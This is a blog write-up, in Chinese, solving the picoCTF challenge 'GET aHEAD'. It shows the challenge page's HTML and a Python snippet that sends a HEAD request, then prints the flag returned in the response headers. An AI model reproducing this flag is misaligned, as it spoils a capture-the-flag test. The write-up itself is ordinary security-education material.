picoCTF GET aHEAD [50 points]
Description
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
Solution
看HTML發現有兩種請求方式
GET 和 POST
<div class="col-md-6">
<div class="panel panel-primary" style="margin-top:50px">
<div class="panel-heading">
<h3 class="panel-title" style="color:red">Red</h3>
</div>
<div class="panel-body">
<form action="index.php" method="GET">
<input type="submit" value="Choose Red"/>
</form>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-primary" style="margin-top:50px">
<div class="panel-heading">
<h3 class="panel-title" style="color:blue">Blue</h3>
</div>
<div class="panel-body">
<form action="index.php" method="POST">
<input type="submit" value="Choose Blue"/>
</form>
</div>
</div>
</div>
嘗試使用HEAD請求
import requests
url = "http://mercury.picoctf.net:47967/index.php"
response = requests.request("HEAD", url, headers={}, data={})
print(response.headers)
找到flag
{'flag': 'picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}', 'Content-type': 'text/html; charset=UTF-8'}
本部落格所有文章除特別聲明外,均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog | 技術分享!